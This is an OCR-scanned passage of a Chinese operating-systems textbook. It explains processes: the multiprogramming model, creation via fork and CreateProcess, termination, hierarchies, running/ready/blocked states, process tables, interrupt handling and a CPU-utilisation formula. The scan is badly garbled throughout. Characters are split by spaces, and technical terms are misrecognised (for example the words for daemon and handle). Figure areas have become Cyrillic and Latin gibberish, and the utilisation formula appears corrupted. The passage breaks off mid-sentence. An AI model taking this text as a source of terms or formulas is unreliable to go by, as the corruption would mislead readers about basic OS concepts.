在 图 2-1a 中 我 们 看 到 ， 在 一 台 多 道 程序 计算 机 的 内 存 中 有 4 道 程序 。 在 图 2-1b 中 ， 这 4 道 程序 被 抽象 
为 4 个 各 自 拥 有 自己 控制 流程 ( 即 每 个 程序 自己 的 逻辑 程序 计数 器 ) 的 进程 ， 并 且 每 个 程序 都 独立 地 运 
行 。 当 然 ， 实 际 上 只 有 一 个 物理 程序 计数 器 ， 所 以 在 每 个 程序 运行 时 ， 它 的 逻辑 程序 计数 器 被 装 入 实际 
的 程序 计数 器 中 。 当 该 程序 执行 结束 (或 暂停 执行 ) 时 ， 物理 程序 计数 器 被 保存 在 内 存 中 该 进程 的 逻辑 
程序 计数 器 中 。 在 图 2-1c 中 我 们 看 到 ， 在 观察 足够 长 的 一 段 时 间 后 ， 所 有 的 进程 都 运行 了 ， 但 在 任何 一 
个 给 定 的 瞬间 仅 有 一 个 进程 真正 在 运行 。 
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一 个 程序 计数 器 


四 个 程序 计数 器 


进程 
切换 


图 2-1 а) 含有 4 道 程序 的 多 道 程序 ，b) 4 个 独立 的 顺序 进程 的 概念 模型 ， 
с) 在 任意 时 刻 仅 有 一 个 程序 是 活跃 的 


在 本 章 ， 我 们 假设 只 有 一 个 CPU。 然 而 ， 逐 源 这 个 假设 就 不 为 真 了 ， 因 为 新 的 芯片 经 常 是 多 核 的 ， 
包含 2 个、4 个 或 更 多 的 CPU。 我 们 将 会 在 第 8 章 介绍 多 核 芯片 以 及 多 处 理 器 ， 但 是 在 现在 ， 一 次 只 考虑 
一 个 CPU 会 更 简单 一 些 。 因 此 ， 当 我 们 说 一 个 CPU 只 能 真正 一 次 运行 一 个 进程 的 时 候 ， 即 使 有 2 个 核 
(或 CPU) ， 每 一 个 核 也 只 能 一 次 运行 一 个 进程 。 

由 于 CPU 在 各 进程 之 间 来 回 快速 切换 ， 所 以 每 个 进程 执行 其 运算 的 速度 是 不 确定 的 。 而 且 当 同一 进 
程 再 次 运行 时 ， 其 运算 速度 通常 也 不 可 再 现 。 所 以 ， 在 对 进程 编程 时 决 不 能 对 时 序 做 任何 确定 的 假设 。 
例如 ， 考 虑 一 个 IO 进程 ， 它 用 流 式 磁带 机 恢复 备份 的 文件 ， 它 执行 一 个 10 000 次 的 空 循环 以 等 待 磁带 机 
达到 正常 速度 ， 然 后 发 出 命令 读 取 第 一 个 记录 。 如 果 CPU 决 定 在 空 循环 期 间 切 换 到 其 他 进程 ， 则 磁带 机 
进程 可 能 在 第 一 条 记录 通过 磁头 之 后 还 未 被 再 次 运行 。 当 一 个 进程 具有 此 类 严格 的 实时 要 求 时 ， 也 就 是 
一 些 特定 事件 一 定 要 在 所 指定 的 若干 毫秒 内 发 生 ， 那 么 必须 采取 特殊 措施 以 保证 它们 一 定 在 这 段 时 间 中 
发 生 。 然 而 ， 通 常 大 多 数 进程 并 不 受 CPU 多 道 程序 设计 或 其 他 进程 相对 速度 的 影响 。 

进程 和 程序 间 的 区 别 是 很 微妙 的 ， 但 非常 重要 。 用 一 个 比喻 可 以 使 我 们 更 容易 理解 这 一 点 。 想 象 一 
位 有 一 手 好 厨 艺 的 计算 机 科学 家 正在 为 他 的 女儿 烘 制 生日 蛋 粕 。 他 有 做 生日 蛋 粒 的 食谱 ， 厨 房 里 有 所 需 
的 原料 : 面粉、 鸡蛋 、 糖 、 香 草 汁 等 。 在 这 个 比喻 中 ， 做 蛋 粒 的 食谱 就 是 程序 ( 即 用 适当 形式 描述 的 算 
法 )， 计 算 机 科学 家 就 是 处 理 器 (CPU)， 而 做 蛋糕 的 各 种 原料 就 是 输入 数据 。 进 程 就 是 厨师 阅读 食谱 、 
取 来 各 种 原料 以 及 烘 制 蛋糕 等 一 系列 动作 的 总 和 。 

现在 假设 计算 机 科学 家 的 儿子 器 着 跑 了 进来 ， 说 他 的 头 被 一 只 蜜蜂 整 了 。 计 算 机 科学 家 就 记录 下 他 
照 着 食谱 做 到 哪儿 了 (保存 进程 的 当前 状态 )， 然 后 拿 出 一 本 急救 手册 ， 按 照 其 中 的 指示 处 理 热 伤 。 这 
里 ， 我 们 看 到 处 理 机 从 一 个 进程 (做 蛋糕 ) 切换 到 另 一 个 高 优先 级 的 进程 (实施 医疗 救治 ) ， 每 个 进程 
拥有 各 自 的 程序 (食谱 和 急救 手册 )。 当 蜜蜂 警 伤 处 理 完 之 后 ， 这 位 计算 机 科学 家 又 回来 做 蛋糕 ， 从 他 
离开 时 的 那 一 步 继续 做 下 去 。 

这 里 的 关键 思想 是 : 一 个 进程 是 某 种 类 型 的 一 个 活动 ， 它 有 程序 、 输 入 、 输 出 以 及 状态 。 单 个 处 理 器 
可 以 被 若干 进程 共享 ， 它 使 用 某 种 调度 算法 决定 何 时 停止 一 个 进程 的 工作 ， 并 转 而 为 另 一 个 进程 提供 服务 。 

值得 注意 的 是 ， 如 果 一 个 程序 运行 了 两 这， 则 算 作 两 个 进程 。 例 如 ， 我 们 可 能 经 常 两 次 去 启动 同一 
个 字 处 理 软件 ， 或 在 有 两 个 可 用 的 打印 机 的 情况 下 同时 打印 两 个 文件 。 像 “两 个 进程 恰好 运行 同一 个 程 
序 ” 这 样 的 事实 其 实 无 关 紧 要 ， 因 为 它们 是 不 同 的 进程 。 操 作 系统 能 够 使 它们 共享 代码 ， 因 此 只 有 一 个 
副本 放 在 内 存 中 ， 但 那 只 是 一 个 技术 性 的 细节 ， 不 会 改变 有 两 个 进程 正在 运行 的 概念 。 


2.1.2 创建 进程 

操作 系统 需要 有 一 种 方式 来 创建 进程 。 一 些 非常 简单 的 系统 ， 即 那 种 只 为 运行 一 个 应 用 程序 设计 的 
系统 〈 例 如 ， 微 波 炉 中 的 控制 器 ) ， 可 能 在 系统 启动 之 时 ， 以 后 所 需要 的 所 有 进程 都 已 存在 。 然 而 在 通 
用 系统 中 ， 需 要 有 某 种 方法 在 运行 时 按 需 要 创建 或 撒 销 进程 。 我 们 现在 开始 考察 这 个 问题 。 

有 4 种 主要 事件 导致 进程 的 创建 : 

1) 系统 初始 化 。 

2) 执行 了 正在 运行 的 进程 所 调用 的 进程 创建 系统 调用 。 

3) 用 户 请 求 创建 一 个 新 进程 。 
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4) 一 个 批 处 理 作 业 的 初始 化 。 

启动 操作 系统 时 ， 通 常会 创建 若干 个 进程 。 其 中 有 些 是 前 台 进 程 ， 也 就 是 同 用 户 (人类) 交互 并 且 
赫 他 们 完成 工作 的 那些 进程 。 其 他 的 是 后 台 进 程 ， 这 些 进程 与 特定 的 用 户 没有 关系 ， 相 反 ， 却 具有 某 些 
专门 的 功能 。 例 如 ， 设 计 一 个 后 台 进程 来 接收 发 来 的 电子 邮件 ， 这 个 进程 在 一 天 的 大 部 分 时 间 都 在 睡眠 
但 是 当 电子 邮件 到 达 时 就 突然 被 唤醒 了 。 也 可 以 设计 另 一 个 后 台 进程 来 接收 对 该 机 器 中 Web 页 面 的 访问 
请 求 ， 在 请 求 到 达 时 唤醒 该 进程 以 便服 务 该 请 求 。 停 留 在 后 台 处 理 诸如 电子 邮件 、Web 页 面 、 新 闻 、 打 
印 之 类 活动 的 进程 称 为 宁 护 进程 (daemon)。 在 大 型 系统 中 通常 有 很 多 守护 进程 。 在 UNIX 中 ， 可 以 用 ps 
程序 列 出 正在 运行 的 进程 ， 在 Windows 中 ， 可 使 用 任务 管理 器 。 

除了 在 启动 阶段 创建 进程 之 外 , 新 的 进程 也 可 以 以 后 创建 。 一 个 正在 运行 的 进程 经 常 发 出 系统 调用 ， 
以 便 创 建 一 个 或 多 个 新 进程 协助 其 工作 。 在 所 要 从 事 的 工作 可 以 容易 地 划分 成 若干 相关 的 但 没有 相互 作 
用 的 进程 时 ， 创 建新 的 进程 就 特别 有 效果 。 例 如 ， 如 果 有 大 量 的 数据 要 通过 网 络 调 取 并 进行 顺序 处 理 
那么 创建 一 个 进程 取 数据 ， 并 把 数据 放 和 共享 缓冲 区 中 ， 而 让 第 二 个 进程 取 走 数据 项 并 处 理 之 ， 应 该 比 
较 容易 。 在 多 处 理 机 中 ， 让 每 个 进程 在 不 同 的 CPU 上 运行 会 使 整个 作业 运行 得 更 快 。 

在 交互 式 系统 中 ， 键 人 一 个 命令 或 者 点 〈 双 ) 击 一 个 图 标 就 可 以 启动 一 个 程序 。 这 两 个 动作 中 的 任 
何 一 个 都 会 开始 一 个 新 的 进程 ， 并 在 其 中 运行 所 选择 的 程序 。 在 基于 命令 行 的 UNIX 系 统 中 运行 程序 X， 
新 的 进程 会 从 该 进程 接管 开启 它 的 窗口 。 在 Microsoft Windows 中 ， 多 数 情 形 都 是 这 样 的 ， 在 一 个 进程 开 
始 时 ， 它 并 没有 窗口 ， 但 是 它 可 以 创建 一 个 (或 多 个 ) 窗口 。 在 UNIX 和 Windows 系 统 中 ， 用 户 可 以 同 
时 打开 多 个 窗口 ， 每 个 窗口 都 运行 一 个 进程 。 通 过 鼠标 用 户 可 以 选择 一 个 窗口 并 且 与 该 进程 交互 ， 例 如 ， 
在 需要 时 提供 输入 。 

最 后 一 种 创建 进程 的 情形 仅 在 大 型 机 的 批 处 理 系统 中 应 用 。 用 户 在 这 种 系统 中 (可 能 是 远程 地 ) 提 
交 批 处 理 作业 。 在 操作 系统 认为 有 资源 可 运行 另 一 个 作业 时 ， 它 创建 一 个 新 的 进程 ， 并 运行 其 输入 队列 
中 的 下 一 个 作业 。 

从 技术 上 看 ， 在 所 有 这 些 情形 中 ， 新 进程 都 是 由 于 一 个 已 存在 的 进程 执行 了 一 个 用 于 创建 进程 的 系 
统 调用 而 创建 的 。 这 个 进程 可 以 是 一 了 的 用 户 进程 、 一 个 由 键盘 或 鼠标 启动 的 系统 进程 或 者 一 个 批 
处 理 管 理 进程 。 这 个 进程 所 做 的 工作 是 ， 执 行 一 个 用 来 创建 新 进程 的 系统 调用 。 这 个 系统 调用 通知 操作 
系统 创建 一 个 新 进程 ， 并 且 直 接 或 间接 地 指定 在 该 进程 中 运行 的 程序 

在 UNIX 系 统 中 ， 只 有 一 个 系统 调用 可 以 用 来 创建 新 进程 : fork。 这 个 系统 调用 会 创建 一 个 与 调用 
进程 相同 的 副本 。 在 调用 了 fork 后 ， 这 两 个 进程 ( 父 进程 和 子 进程 ) 拥有 相同 的 存储 映像 、 同 样 的 环境 
字符 串 和 同样 的 打开 文件 。 这 就 是 全 部 情形 。 通 常 ， 子 进程 接着 执行 execve 或 一 个 类 似 的 系统 调用 ， 以 
修改 其 存储 映像 并 运行 一 个 新 的 程序 。 例 如 ， 当 一 个 用 户 在 shell 中 键入 命令 sort 时 ，shell 就 创建 一 个 子 
进程 ， 然 后 ， 这 个 子 进程 执行 sort。 之 所 以 要 安排 两 步 建立 进程 ， 是 为 了 在 fork 之 后 但 在 execve 之 前 多 
许 该 子 进程 处 理 其 文件 描述 符 ， 这 样 可 以 完成 对 标准 输入 、 标 准 输出 和 标准 出 错 的 重 定向 。 

在 Windows 中 ,情形 正 相反 ， 一 个 Win32 函 数 调用 CreateProcess 既 处 理 进程 的 创建 ， 也 负责 把 正 
确 的 程序 装 入 新 的 进程 。 该 调用 有 10 个 参数 ， 其 中 包括 要 执行 的 程序 、 输 入 给 该 程序 的 命令 行 参 数 、 各 
种 安全 属性 、 有 关 打开 的 文件 是 否 继承 的 控制 位 、 优 先 级 信息 、 为 该 进程 ( 若 有 的 话 ) 所 需要 创建 的 窗 
口 规格 以 及 指向 一 个 结构 的 指针 ， 在 该 结构 中 新 创建 进程 的 信息 被 返回 给 调用 者 。 除 了 CreateProcess， 
Win32 中 有 大 约 100 个 其 他 的 函数 用 于 处 理 进程 的 管理 、 同 步 以 及 相关 的 事务 。 

在 UNIX 和 Windows 中 ， 进 程 创建 之 后 ， 父 进程 和 子 进程 有 各 自 不 同 的 地 址 空间 。 如 果 其 中 某 个 进 
程 在 其 地 址 空间 中 修改 了 一 个 字 ， 这 个 修改 对 其 他 进程 而 言 是 不 可 见 的 。 在 UNIX 中 ， 子 进程 的 初始 地 
址 空间 是 父 进程 的 一 个 副本 ， 但 是 这 里 涉及 两 个 不 同 的 地 址 空间 ， 不 可 写 的 内 存 区 是 共享 的 〈( 某 些 
UNIX 的 实现 使 程序 正文 在 两 者 间 共 享 ， 因 为 它 不 能 被 修改 )。 但 是 ， 对 于 一 个 新 创建 的 进程 而 言 ， 确 实 
有 可 能 共享 其 创建 者 的 其 他 资源 ， 诸 如 打开 的 文件 等 。 在 Windows 中 ， 从 一 开始 父 进程 的 地 址 空间 和 子 
进程 的 地 址 空间 就 是 不 同 的 。 


2.1.3 进程 的 终止 
进程 在 创建 之 后 ， 它 开始 运行 ， 完 成 其 工作 。 但 永恒 是 不 存在 的 ， 进 程 也 一 样 。 迟 早 这 个 新 的 进程 
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会 终止 ， 通 常 由 下 列 条 件 引 起 : 

D) 正常 退出 (自愿 的 )。 

2) 出 错 退 出 (АЖИ). 

3) 严重 错误 〈 非 自愿 ) 。 

4) 被 其 他 进程 杀 死 ( 非 自 愿 ) 。 

多 数 进程 是 由 于 完成 了 它们 的 工作 而 终止 。 当 编译 器 完成 了 所 给 定 程序 的 编译 之 后 ， 编 译 器 执行 一 
个 系统 调用 ， 遂 知 操作 系统 它 的 工作 已 经 完成 。 在 UNIX 中 该 调用 是 exit， 而 在 Windows 中 ， 相 关 的 调用 
是 ExitProcess。 面 向 屏幕 的 程序 也 支持 自愿 终止 。 字 处 理 软件 、Internet 浏 览 器 和 类 似 的 程序 中 总 有 一 
个 供用 户 点 击 的 图 标 或 菜单 项 ， 用 来 通知 进程 删除 它 所 打开 的 任何 临时 文件 ， 然 后 终止 。 

进程 终止 的 第 二 个 原因 是 进程 发 现 了 严重 错误 。 例 如 ， 如 果 用 户 键入 命令 

сс foo.c 
要 编译 程序 foo.c， 但 是 该 文件 并 不 存在 ， 于 是 编译 器 就 会 退出 。 在 给 出 了 错误 参数 时 ， 面 向 屏幕 的 交互 
式 进程 通常 并 不 退出 。 相 反 ， 这 些 程序 会 弹出 一 个 对 话 框 ， 并 要 求 用 户 再 试 一 次 。 

进程 终止 的 第 三 个 原因 是 由 进程 引起 的 错误 ， 通 常 是 由 于 程序 中 的 错误 所 致 。 例如， 执行 了 一 条 非 
法 指令 、 引 用 不 存在 的 内 存 ， 或 除数 是 零 等 。 有 些 系统 中 (如 UNIX) ， 进 程 可 以 通知 操作 系统 ， 它 希望 
自行 处 理 某 些 类 型 的 错误 ， 在 这 类 错误 中 ， 进 程 会 收 到 信号 (被 中 断 ) ， 而 不 是 在 这 类 错误 出 现时 终止 。 

第 四 种 终止 进程 的 原因 是 ， 某 个 进程 执行 一 个 系统 调用 通知 操作 系统 杀 死 某 个 其 他 进程 。 在 UNIX 
中 ， 这 个 系统 调用 是 kil。 在 Win32 中 对 应 的 函数 是 TerminateProcess。 在 这 两 种 情形 中 , “杀手 ”都 必 
须 获得 确定 的 授权 以 便 进行 动作 。 在 有 些 系统 中 ， 当 一 个 进程 终止 时 ， 不 论 是 自愿 的 还 是 其 他 原因 ， 由 
该 进程 所 创建 的 所 有 进程 也 一 律 立 即 被 杀 死 。 不 过 ，UNIX 和 Windows 都 不 是 这 种 工作 方式 。 


2.1.4 进程 的 层次 结构 

某 些 系统 中 ， 当 进程 创建 了 另 一 个 进程 后 ， 父 进程 和 子 进 程 就 以 某 种 形式 继续 保持 关联 。 子 进程 自 
身 可 以 创建 更 多 的 进程 ， 组 成 一 个 进程 的 层次 结构 。 请 注意 ， 这 与 植物 和 动物 的 有 性 繁殖 不 同 ， 进程 只 
有 一 个 父 进程 (但 是 可 以 有 零 个 、 一 个 、 两 个 或 多 个 子 进程 )。 

在 UNIX 中 ， 进 程 和 它 的 所 有 子女 以 及 后 毅 共 同 组 成 一 个 进程 组 。 当 用 户 从 键盘 发 出 一 个 信号 时 ， 
该 信号 被 送 给 当前 与 键盘 相关 的 进程 组 中 的 所 有 成 员 (它们 通常 是 在 当前 窗口 创建 的 所 有 活动 进程 ) 。 
每 个 进程 可 以 分 别 捕获 该 信号 、 忽 略 该 信号 或 采取 默认 的 动作 ， 即 被 该 信号 杀 死 。 

这 里 有 另 一 个 例子 ， 可 以 用 来 说 明 进 程 层次 的 作用 ， 考 虑 UNIX 在 启动 时 如 何 初始 化 自己 。 一 个 称 
为 init 的 特殊 进程 出 现在 启动 映像 中 。 当 它 开 始 运行 时 ， 读 入 一 个 说 明 终 端 数量 的 文件 。 接 着 ， 为 每 个 
终端 创建 一 个 新 进程 。 这 些 进程 等 待 用 户 登录 。 如 果 有 一 个 用 户 登录 成 功 ， 该 登录 进程 就 执行 一 个 shell 
准备 接收 命令 。 所 接收 的 这 些 命令 会 启动 更 多 的 进程 ， 以 此 类 推 。 这 样 ， 在 整个 系统 中 ， 所 有 的 进程 都 
属于 以 init 为 根 的 一 棵 树 。 

相反 ，Windows 中 没有 进程 层次 的 概念 ， 所 有 的 进程 都 是 地 位 相同 的 。 惟一 类 似 于 进程 层次 的 暗示 
是 在 创建 进程 的 时 候 ， 父 进程 得 到 一 个 特别 的 令 牌 ( 称 为 机 柄 ) ， 该 句柄 可 以 用 来 控制 子 进程 。 但 是 ， 
它 有 权 把 这 个 令 牌 传送 给 某 个 其 他 进程 ， 这 样 就 不 存在 进程 层次 了 。 在 UNIX 中 ， 进程 就 不 能 剥夺 其 子 
女 的 “继承 权 ”。 
21.5 进程 的 状态 

尽管 每 个 进程 是 一 个 独立 的 实体 ， 有 其 自己 的 程序 计数 器 和 内 部 状态 ， 但 进程 之 间 经 常 需要 相互 作 
用 。 一 个 进程 的 输出 结果 可 能 作为 另 一 个 进程 的 输入 。 在 shell 命 令 

cat chapter1 chapter2 chapter3 | grep tree 
中 ， 第 一 个 进程 运行 cat， 将 三 个 文件 连接 并 输出 。 第 二 个 进程 运行 grep， 它 从 输入 中 选择 所 有 包含 单词 
“tree” 的 那些 行 。 根 据 这 两 个 进程 的 相对 速度 (这 取决 于 这 两 个 程序 的 相对 复杂 度 和 各 自 所 分 配 到 的 
CPU 时 间 )， 可 能 发 生 这 种 情况 : grep 准 备 就 绪 可 以 运行 ， 但 输入 还 没有 完成 。 于 是 必须 阻塞 grep， 直 到 
输入 到 来 。 
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当 一 个 进程 在 逻辑 上 不 能 继续 运行 时 ， 它 就 会 被 阻塞 ， 典 型 的 例子 是 它 在 等 待 可 以 使 用 的 输入 。 还 
可 能 有 这 样 的 情况 : 一 个 概念 上 能 够 运行 的 进程 被 迫 停止 ， 因 为 操作 系统 调度 另 一 个 进程 占用 了 CPU 。 
这 两 种 情况 是 完全 不 同 的 。 在 第 一 种 情况 下 ， 进 程 挂 起 是 程序 自身 固有 的 原因 (在 键入 用 户 命令 行 之 前 ， 
无 法 执行 命令 )。 第 二 种 情况 则 是 由 系统 技术 上 的 原因 引起 的 (由 于 没有 足够 的 CPU， 所 以 不 能 使 每 个 
进程 都 有 一 台 它 私 用 的 处 理 器 )。 在 图 2-2 中 可 以 看 到 显示 进程 的 三 种 状态 的 状态 图 。 这 三 种 状态 是 ， 

1 运行 态 〈 该 时 刻 进程 实际 占用 CPU ) 。 

2) 就 绪 态 (可 运行 ， 但 因为 其 他 进程 正在 运行 而 暂时 停止 )。 

3) 阻塞 态 (除非 某 种 外 部 事件 发 生 ， 否 则 进程 不 能 运行 ) 。 
前 两 种 状态 在 逻辑 上 是 类 似 的 。 处 于 这 两 


种 状态 的 进程 都 可 以 运行 ， 只 是 对 于 第 二 СЭ; нн 
种 状态 暂时 没有 CPU 分 配给 它 。 第 三 种 状 ох ы 
态 与 前 两 种 状态 不 同 ， 处 于 该 状态 的 进程 2: Meerin 
不 能 运行 ， 即 使 CPU 空闲 也 不 行 。 C Са 

进程 的 三 种 状态 之 间 有 四 种 可 能 的 转 


换 关系 ， 如 图 2-2 所 示 。 在 操作 系统 发 现 进 
程 不 能 继续 运行 下 去 时 ， 发 生 转换 1。 在 某 M22 наат, АБН, 

些 系统 中 ， 进 程 可 以 执行 一 个 诸如 pause 的 图 中 显示 出 各 状态 之 闻 的 转换 

系统 调用 来 进 和 阻塞 状态 。 在 其 他 系统 中 ， 

包括 UNIX， 当 一 个 进程 从 管道 或 设备 文件 例如 终端 读 取 数据 时 ， 如 果 没有 有 效 的 输入 存在 ， 虽 进 
ВФЕ ШЕ, 

转换 2 和 3 是 由 进程 调度 程序 引起 的 进程 调 庶 程 序 是 操作 系统 的 部分， 进程 其 至 感觉 不 到 调度 各 
序 的 存在 。 系 统 认为 一 个 运行 进程 占用 处 理 器 的 时 间 已 经 过 长， 决定 让 其 他 进程 使 用 CPU 时 间 时 ， 会 人 
生 转 换 ?。 在 系统 已 经 让 所 有 其 他 进程 京 有 了 它们 应 有 的 公平 待遇 而 重新 轮 到 第 一 个 进程 再 次 占用 CPU 
运行 时 ， 会 发 生 转换 3。 调 度 程序 的 主要 工作 就 是 决定 应 当 运行 哪 人 进程 、 何 时 运行 及 它 应 该 运行 多 长 
时 间 ， 这 是 很 重要 的 一 点 ， 我 们 将 在 本 章 的 后 而 部 分 进行 讨论 ， 已 经 提出 了 许多 算法 ， 这 些 算法 力图 在 
整体 效率 和 进程 的 竞争 公平 性 之 间 取 得 平衡 。 我 们 将 在 本 章 稍 后 部 分 研究 其 中 的 一 些 门 是。 

当 进程 等 竺 的 一 个 外 部 事件 发 时 (如 一些 答 入 到 过 )， 则 发生 转换 4。 如 果 此 时 没有 其 他 进 和 运行， 
则 立即 触发 转换 3， 访 进程 便 开始 运行 。 否则 该 进程 将 处 于 就 结 态 ， 等 待 CPU 空闲 并 且 轮 到 它 运行。 

使 用 进程 模型 使 得 我 们 易于 想象 系统 
内 部 的 操作 状况 。 一 些 进程 正在 运行 执行 用 
户 键入 命令 所 对 应 的 程序 。 另 一 些 进程 是 系 
统 的 一 部 分 ， 它 们 的 任务 是 完成 下 列 一 些 工 
е, 比如， 执行 文件 服务 请 求 、 管 理 破 盘 上 
动 器 和 磁带 机 的 运行 细节 等 。 当 发 和 一 个 
анттан: Д 
进程 ， 转 而 运行 磁盘 进程 ， 该 进程 在 此 之 前 ену черта 
АРАРАТА Ча Ж &. эх, TRT 
ОИКААЕНИТ, УЫ В ЛУЧА, RER, ЫДАН В, ае в АЛЕ ТЕСКЕ, 
ЕПА АНВАТ, BENKER, ERITREA, 

从 这 个 观点 引出 了 图 2-3 所 示 的 模型 。 在 图 2-3 中 ， 操 作 系统 的 最 底层 是 调度 程序 ， 在 它 上 面 有 许多 
进程。 所 有 关于 中 断 处 理 、 启 动 进程 和 停止 进程 的 具体 细节 都 隐 冲 在 调度 程 译 中 。 实 际 上 ， 调 诬 程 序 是 
一 段 非常 短小 的 程序 。 操 作 系统 的 其 他 部 分 被 简单 地 组 织 成 进 和 的 形式 。 不 过 ， 祖 少 有 真实 的 系统 是 以 
这 样 的 理想 方式 构造 的 。 


2.1.6 进程 的 实现 
为 了 实现 进程 模型 ， 操 作 系统 维护 着 一 张 表格 (一 个 结构 数组 )， 即 进程 表 (process table)。 每 个 进 
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程 占用 一 个 进程 表 项 。( 有 些 作者 称 这 些 表 项 为 进程 控制 块 。) 该 表 项 包含 了 进程 状态 的 重要 信息 ， 包 括 
程序 计数 器 、 堆 栈 指针 、 内 存 分 配 状 况 、 所 打开 文件 的 状态 、 账 号 和 调度 信息 ， 以 及 其 他 在 进程 由 运行 
态 转 换 到 就 绪 态 或 阻塞 态 时 必须 保存 的 信息 ， 从 而 保证 该 进程 随后 能 再 次 启动 ， 就 像 从 未 被 中 断 过 一 样 。 

图 2-4 中 展示 了 在 一 个 典型 系统 中 的 关键 字段 。 第 一 列 中 的 字段 与 进程 管理 有 关 。 其 他 两 列 分 别 与 
存储 管理 和 文件 管理 有 关 。 应 该 注意 到 进程 表 中 的 字段 是 与 系统 密切 相关 的 ， 不 过 该 图 给 出 了 所 需要 信 
息 的 大 致 介绍 。 


存储 管理 文件 管理 
| 正文 段 指针 根 目录 
数据 段 指针 | 工作 目录 
程序 状态 字 堆栈 段 指针 文件 描述 符 
堆栈 指针 | MeD 
进程 状态 组 ID 


ш 
Е 
ж 
w 


进程 组 
信号 

进程 开始 时 间 

使 用 的 CPU 时 间 

子 进程 的 CPU 时 间 | 
下 次 报警 时 间 | 


图 2-4 典型 的 进程 表 表 项 中 的 一 些 字段 


在 了 解 进程 表 后 ,就 可 以 对 在 单个 (或 每 一 个 ) CPU 上 如 何 维持 多 个 顺序 进程 的 错觉 做 更 多 的 闲 述 。 
与 每 一 MO 类 关联 的 是 一 个 称 作 中 断 向 量 (interrupt vector) 的 位 置 (靠近 内 存 底部 的 固定 区 域 )。 它 包 
含 中 上 断 服务 程序 的 入 口 地 址 。 假 设 当 一 个 磁盘 中 断 发 生 时 ， 用 户 进程 3 正在 运行 ， 则 中 上 硬件 将 程序 计 
数 器 、 程 序 状 态 宇 ， 有 时 还 有 一 个 或 多 个 寄存 器 压 人 堆栈 ， 计 算 机 随即 跳 转 到 中 断 向 量 所 指示 的 地 址 。 
这 些 是 硬件 完成 的 所 有 操作 ， 然 后 软件 ， 特 别 是 中 断 服务 例 程 就 接管 一 切 剩余 的 工作 。 

所 有 的 中 断 都 从 保存 寄存 器 开始 ， 对 于 当前 进程 而 言 ， 通 常 是 在 进程 表 项 中 。 随 后 ， 会 从 堆栈 中 删 
除 由 中 断 硬件 机 制 在 人 堆栈 的 那 部 分 信息 ， 并 将 堆栈 指针 指向 一 个 由 进程 处 理 程序 所 使 用 的 临时 堆 术 。 
- 些 诸如 保存 寄存 器 值 和 设置 堆 本 指针 等 操作 ， 无 法 用 C 语 言 这 一 类 高 级 语言 描述 ， 所 以 这 些 操作 通过 
一 个 短小 的 汇编 语言 例 程 来 完成 ， 通 常 该 例 程 可 以 供 - 
所 有 的 中 断 使 用 ， 因 为 无 论 中 断 是 怎样 引起 的 ， 有 关 B NA 
保存 寄存 器 的 工作 则 是 完全 一 样 的 。 зсапанваетеви. 

当 该 例 程 结束 后 ， 它 调用 一 个 C 过 程 处 理 某 个 特 | 4 汇编 语言 过 程 设置 新 的 堆 梳 。 
定 的 中 断 类 型 利 下 的 工作 。 (假定 操作 系统 由 C 语 言 编 | шира a e 
写 ， 通 常 这 是 所 有 真实 操作 系统 的 选择 ) 。 在 完成 有 |T C 过 程 返回 至 汇编 代码 。 
关 工作 之 后 ， 大 概 就 会 使 某 些 进程 就 结 ， 接 着 调用 调 | 8- 汇编 语言 过 程 开始 运行 新 的 当前 进程 
度 程序 ， 决 定 随后 该 运行 哪个 进程 。 随 后 将 控制 转 给 
一 段 汇编 语言 代码 ， 为 当前 的 进程 装 人 寄存 器 值 以 及 “图 АШ 
内 存 映射 并 启动 该 进程 运行 。 图 2-5 中 总 结 了 中 断 处 理 和 调度 的 过 程 。 值 得 注意 的 是 ， 各 种 系统 之 间 某 
些 细节 会 有 所 不 同 。 

当 该 进程 结束 时 ， 操 作 系 统 显示 一 个 提示 符 并 等 待 新 的 命令 。 一 旦 它 接 到 新 命令 ， 就 装 入 新 的 程序 
HAE, ВЕСИ УВЕ, 
21.7 多 道 程序 设计 模型 

采用 多 道 程序 设计 可 以 提高 CPU 的 利用 率 。 严 格 地 说 ， 如 果 进 程 用 于 计算 的 平均 时 间 是 进程 在 内 存 
中 停留 时 间 的 20%， 且 内 存 中 同时 有 5 个 进程 ， 则 CPU 将 一 直 满 负载 运行 。 然 而 ， 这 个 模型 在 现实 中 过 
于 乐观 ， 因 为 它 假设 这 5 个 进程 不 会 同时 等 待 /O。 
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更 好 的 模型 是 从 概率 的 角度 来 看 CPU 的 利用 率 。 假 设 一 个 进程 等 待 O 操 作 的 时 间 与 其 停留 在 内 存 
中 时 间 的 比 为 p。 当 内 存 中 同时 有 n 个 进程 时 ， 则 所 有 "个 进程 都 在 等 待 YO (此 时 CPU 空转 ) 的 概率 是 Pr。 
CPU 的 利用 率 由 下 面 的 公式 给 出 

CPU 利用 率 = 1-р" 

图 2-6 以 n 为 变量 的 函数 表示 了 CPU 的 利 
用 率 ，n 称 为 多 道 程序 设计 的 道 数 (degree of 
multiprogramming ) 。 

从 图 2-6 中 可 以 清楚 地 看 到 ， 如 果 进 程 花 
费 80% 的 时 间 等 待 UO， 为 使 CPU 的 浪费 低 于 
10%， 至 少 要 有 10 个 进程 同时 在 内 存 中 。 当 读 
者 认识 到 一 个 等 待 用户 从 终端 输入 的 交互 式 
进程 是 处 于 IO 等 待 状态 时 ， 那 么 很 明显 
80% 其 至 更 多 的 LO 等 待 时 间 是 普遍 的 。 即 使 
是 在 服务 器 中 ， 做 大 量 磁盘 1/O 操 作 的 进程 也 
会 花费 同样 或 更 多 的 等 待 时 间 。 злетонак 

从 完全 精确 的 角度 考虑 ， 应 该 指出 此 概 图 2-6 CPU 利用 率 是 内 存 中 进程 数目 的 函数 
率 模 型 只 是 描述 了 一 个 大 臻 的 状况 。 它 假设 
所 有 n 个 进程 是 独立 的 ， 即 内 存 中 的 5 个 进程 中 ，3 个 运行 ，2 个 等 等 ， 是 完全 可 接受 的 。 但 在 单 CPU 中 ， 
不 能 同时 运行 3 个 进程 ， 所 以 当 CPU 忙 时 ， 已 就 绪 的 进程 也 必须 等 待 CPU。 因 而 ， 进 程 不 是 独立 的 。 更 
精确 的 模型 应 该 用 排队 论 构 造 ， 但 我 们 的 模型 ( 当 进程 就 结 时 ， 给 进程 分 配 CPU， 否 则 让 CPU 空转 ) 仍 
然 是 有 效 的 ， 即 使 图 2-6 的 真实 曲线 会 与 图 中 所 夯 的 略 有 不 同 。 

虽然 图 2-6 的 模型 很 简单 ， 很 粗略 ， 它 依然 对 预测 CPU 的 性 能 很 有 效 。 例 如 ， 假 设计 算 机 有 512MB 
